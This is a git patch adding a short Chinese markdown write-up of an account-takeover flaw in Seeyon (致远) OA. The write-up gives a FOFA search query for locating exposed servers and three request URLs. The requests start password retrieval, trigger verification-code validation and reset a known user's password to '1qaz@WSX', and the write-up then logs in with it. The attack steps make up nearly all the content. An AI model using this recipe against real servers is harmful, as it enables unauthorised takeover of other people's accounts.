From 811fd99a606d7ba682a32ca6fa5659e11eb38b61 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 9 Mar 2024 14:58:45 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E8=87=B4=E8=BF=9C=E5=89=8D=E5=8F=B0?= =?UTF-8?q?=E4=BB=BB=E6=84=8F=E7=94=A8=E6=88=B7=E5=AF=86=E7=A0=81=E4=BF=AE?= =?UTF-8?q?=E6=94=B9.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
致远前台任意用户密码修改.md | 27 +++++++++++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 致远前台任意用户密码修改.md
diff --git a/致远前台任意用户密码修改.md b/致远前台任意用户密码修改.md
new file mode 100644
index 0000000..3d85d99
--- /dev/null
+++ b/致远前台任意用户密码修改.md
@@ -0,0 +1,27 @@
+## 致远前台任意用户密码修改
+
+## fofa
+```
+app="致远互联-OA"
+```
+
+## 漏洞复现
+前提需要知道用户名
+
+`http://xx.xx.xx.xx/seeyon/personalBind.do?method=retrievePassword`
+
+image-20240301101704702
+
+`http://xx.xx.xx.xx/seeyon/personalBind.do?method=sendVerificationCodeToBindNum&type=validate&origin=zx`
+
+image-20240301101722837
+
+修改密码为`1qaz@WSX`
+
+`http://xx.xx.xx.xx/seeyon/individualManager.do?method=resetPassword&nowpwd=1qaz@WSX`
+
+image-20240301101802224
+
+最后使用修改的密码登录
+
+image-20240301101840756